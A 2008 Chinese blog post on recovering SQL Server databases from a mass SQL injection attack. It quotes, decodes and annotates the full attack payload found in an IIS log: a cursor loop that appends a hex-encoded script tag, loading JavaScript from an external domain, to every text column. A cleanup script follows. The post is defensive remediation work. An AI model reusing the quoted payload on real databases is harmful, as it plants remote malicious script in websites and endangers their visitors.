sb.5252.ws恶意注入解决方法

最新推荐文章于 2022-11-30 15:00:16 发布
最新推荐文章于 2022-11-30 15:00:16 发布
阅读量1.4k 收藏
点赞数
文章标签: table sql server c 数据库 sql 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xgl1999/article/details/2590708
版权

首先鄙视下,最近很多人都遭了殃 其实这个本身还是利用网站安全漏洞进行注入的 所以大家一定要加强网站提交数据或传参时候的控制。。一定要严格处理。尽量避免使用“+“号运算符链接sql语句并执行 下边说下解决方法把。我的是03服务器,数据库是sql server 2005(貌似遭殃的都是sql server) 首先,打开你的iis日志,如果没有改动的话应该在 c:/windows/system32/logfiles/httperr/ 目录下 按时间最近的开始查,在里边查找declare(因为它使用的是动态sql语句,所以必须定义变量) 不要怕费时。。怕费事的话可以用《文本替换专家查找》 找到以后,会发现有这样一条记录 2008-05-06 21:07:53 a.a.a.a 34717 b.b.b.b 80 HTTP/1.1 GET /showtree.aspx?topicid=56008&postid=414578;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- - 3 Timer_MinBytesPerSecond 进程池 红色部分是错误文件,大家一定要修复,仔细检查。。确认无漏洞 其中a.a.a.a是访问者(可能是攻击者)的ip,b.b.b.b服务器IP 其中你会发现

1 ; dEcLaRe % 20 @t % 20 vArChAr ( 255 ), @c % 20 vArChAr ( 255 ) % 20 dEcLaRe % 20tAbLe_cursoR % 20 cUrSoR % 20 FoR % 20 sElEcT % 20a.nAmE,b.nAmE % 20 FrOm % 20sYsObJeCtS % 20a,sYsCoLuMnS % 20b % 20 wHeRe % 20a.iD = b.iD % 20 AnD% 20a.xTyPe = ' u ' % 20 AnD% 20 (b.xTyPe = 99 % 20 oR% 20b.xTyPe = 35 % 20 oR% 20b.xTyPe = 231 % 20 oR% 20b.xTyPe = 167 ) % 20 oPeN % 20tAbLe_cursoR % 20 fEtCh % 20 next % 20 FrOm % 20tAbLe_cursoR % 20 iNtO % 20 @t , @c % 20 while ( @@fEtCh_status = 0 ) % 20 bEgIn % 20 exec ( ' UpDaTe%20[ ' % 2b @t % 2b ' ]%20sEt%20[ ' % 2b @c % 2b ' ]=rtrim(convert(varchar,[ ' % 2b @c % 2b ' ]))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67)) ' ) % 20 fEtCh % 20 next % 20 FrOm % 20tAbLe_cursoR % 20 iNtO % 20 @t , @c % 20 eNd % 20 cLoSe % 20tAbLe_cursoR % 20 dEAlLoCaTe % 20tAbLe_cursoR;

这就是被注入的语句。很强大啊。呵呵 但是很乱,因为是经过URL编码的。。我们用UrlDecode方法解密后得到的代码,我们把前后的分号都去掉看

 1 dEcLaRe   @t   vArChAr ( 255 ), @c   vArChAr ( 255 ) --定义变量  2 dEcLaRe  tAbLe_cursoR  cUrSoR --游标  3 FoR   sElEcT  a.nAmE,b.nAmE  FrOm  sYsObJeCtS a,sYsCoLuMnS b  wHeRe  a.iD = b.iD  AnD  a.xTyPe = ' u '   AnD  (b.xTyPe = 99   oR  b.xTyPe = 35   oR  b.xTyPe = 231   oR  b.xTyPe = 167 ) --遍历表和字段  4 oPeN  tAbLe_cursoR  fEtCh   next   FrOm  tAbLe_cursoR  iNtO   @t , @c --打开游标  5 while ( @@fEtCh_status = 0 ) --开始  6 bEgIn    7 --这里执行更新操作呢。。注意 -- exec ( ' UpDaTe [ ' + @t + ' ] sEt [ ' + @c + ' ]=rtrim(co 插入代码 nvert(varchar,[ ' + @c + ' ]))+cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) '  8 fEtCh   next   FrOm  tAbLe_cursoR  iNtO   @t , @c --下一条记录  9 eNd --结束 10 cLoSe  tAbLe_cursoR --还不错,把游标给关了 11 dEAlLoCaTe  tAbLe_cursoR --再次感谢

大家都知道上边进行了什么操作了吧。。 这就是我们数据库里无缘无故多了东西的原因 下边说一下怎么恢复数据库 首先说明下,不一定完全奏效,因为在插入数据的时候,有些被强制揭去了一部分。。大家最好有备份 其实很简单,把刚才的语句反写就可以了 作此操作钱为了避免数据丢失请先备份数据库,每个人可能被注入的内容不一样,一定要变通,从第一步做起

 1 dEcLaRe   @t   vArChAr ( 255 ), @c   vArChAr ( 255  2 dEcLaRe  tAbLe_cursoR  cUrSoR    3 FoR   sElEcT  a.nAmE,b.nAmE  FrOm  sYsObJeCtS a,sYsCoLuMnS b  wHeRe  a.iD = b.iD  AnD  a.xTyPe = ' u '   AnD  (b.xTyPe = 99   oR  b.xTyPe = 35   oR  b.xTyPe = 231   oR  b.xTyPe = 167  4 oPeN  tAbLe_cursoR  fEtCh   next   FrOm  tAbLe_cursoR  iNtO   @t , @c    5 while ( @@fEtCh_status = 0  6 bEgIn    7 exec ( ' UpDaTe [ ' + @t + ' ] sEt [ ' + @c + ' ]=replace(convert(varchar,[ ' + @c + ' ]),cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)), '''' ) '  8 fEtCh   next   FrOm  tAbLe_cursoR  iNtO   @t , @c    9 eNd   10 cLoSe  tAbLe_cursoR  11 dEAlLoCaTe  tAbLe_cursoR 12

好了,检查下数据库吧 最根本的解决方法还是加强sql语句的过滤,加强html脚本的过滤

xgl1999
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3545
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
Imap.rar_imap_imap.sb.1cr_winsock imap_邮箱
09-21
IMAP邮箱管理,应该IMAP协议获取未读邮箱个数
scratch吃豆子游戏.sb2
07-08
scratch吃豆子游戏.sb2
力度器.sb3(输入的数不要大于1300)
09-06
力度器 是用Scratch 3编得一款.sb3 主要是数如力度让小球飞的一款Scratch 编的 力度越大小球滚的越快 (温馨提示:请不要尝试输入999999)
星际SB520,非常好用的哈
12-16
这个是现在的最新的哈,我一般不给别人的,现在需要积分所以给你们!
scratch小游戏 字母射击.sb3
最新发布
10-28
scratch小游戏 字母射击.sb3
星际反作弊2.3for-win7-xp-win8-win10
ddz777751的博客
03-25 1419
星际反作弊2.3for-win7-xp-win8-win10 下载地址 http://wj800.com/rar/scfzb.zip 转载于:https://www.cnblogs.com/cfas/p/5319883.html
关于shiro自定义realm无法注入bean的问题
wsdssb521的博客
11-17 1237
今天因为业务需要,需要自定义多个realm(自行百度),当我把代码写好之后,发现在realm中@Autowire注入的bean都是null 在网上也百度了很久,各种解决方案,都没有效果,最后发现原来是 @Bean(name = "lifecycleBeanPostProcessor") public static LifecycleBeanPostProcessor lifecycleBeanPostProcessor() { return new LifecycleBea...
Linux提权
小袁的博客
11-30 1233
linux提权
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
youngerll的博客
01-03 2036
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
sb_edac.rar_ddr4_ex_sb_edac.rar
09-24
Intel Sandy Bridge -EN -EP -EX Memory Controller kernel module.
魔兽争霸 / 星际争霸 无法使用 CTRL + 1 进行编队
闲云孤鹤
02-19 5887
打游戏时发现不好编队, 应该是快捷键冲突导致。 查了一下,是输入法的问题。 目前用的QQ五笔输入法里用到了 CTRL + 1,所以在游戏里就会不了了。 如下面所示,把最后的 CTRL + 1 的复选框勾掉就可以了。
NC ws接口防XXE注入
guaizang的博客
04-03 664
有风险的地方有两个 1.接口返回xml的格式化操作,SoapFormatAction,但是一般都打了补丁做了处理 实际上还可以在org.apache.xalan.transformer.TransformerIdentityImpl里解析之前加上下面代码也可以防止注入 2.调用接口时,一般来说如果服务是由home里startup.bat/startup.sh来启动的话是不会有风险的,但如果服务是由...
xss注入教程与总结
qq_39616910的博客
02-23 3278
xss注入总结 1 " < >可以用URL编码 %22 %3c %3e HTML 编码 &quot; &lt; &gt; 代替 2 如果过滤 可以用%2522 %26colon; 这种代替尝试 二次转码 3 如果输入框有历史记录 ,个人简介注意使用 发现很多网站对输入框有过滤缺但没有过滤历史记录这些的输出,输出的语句会运行 4 思路就是打破结构 不管是哪里的输入框 还要关注输出(历史记录,标题,评论,个人性息编辑的输出位置等)也可能触发 5 注意空格,减号,..
flask + vue 的socket.io的应用
weixin_42432439的博客
05-08 1578
flask后端的代码我就不贴出来了,网上有很多,只是如果vue与flask分开运行的话,需要flask的跨域处理,添加这样一行代码 socketio = SocketIO(app,cors_allowed_origins='*') vue前端,知道很多人用vue-socket.io,但是我用了之后,可以发送消息给flask(flask也收到了),但就是触发不了sockets里面的接收函数,但是用...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8702
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3097
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
sb.set_context()方法有哪些参数设置
06-02
sb.set_context()方法有以下两个参数: 1. context: 这是一个字符串类型,表示要设置的上下文信息。可以是单个字符串,也可以是包含多个字符串的列表。 2. append: 这是一个布尔类型的参数,表示是否将新的上下文...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值